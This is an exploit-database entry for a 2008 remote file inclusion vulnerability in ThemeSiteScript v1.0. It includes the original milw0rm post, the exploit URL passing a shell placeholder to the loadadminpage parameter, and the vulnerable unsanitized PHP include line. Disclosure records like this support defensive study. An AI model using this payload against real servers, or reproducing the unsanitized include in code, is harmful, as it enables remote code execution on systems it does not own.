header-logo
Suggest Exploit
vendor:
ThemeSiteScript
by:
DaRkLiFe
8.8
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: ThemeSiteScript
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:agaresmedia:themesitescript:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ThemeSiteScript v1.0 Remote File Inclusion Vulnerability

ThemeSiteScript v1.0 is vulnerable to a Remote File Inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. The vulnerable code is located in the frontpage_right.php file, line 2, which includes the $loadadminpage variable without any sanitization.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files. Sanitization of user input should be done to prevent malicious code from being executed.
Source

Exploit-DB raw data:

**************************************************************************************

Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d

**************************************************************************************
Script   :

ThemeSiteScript v1.0 Remote File Inclusion Vulnerability

Home Page :

http://agaresmedia.com

Download :

http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar

**************************************************************************************

Exploit :

http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?

**************************************************************************************

Vulnerable : line 2 : <?PHP include($loadadminpage); ?>

**************************************************************************************

THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************

# milw0rm.com [2008-10-28]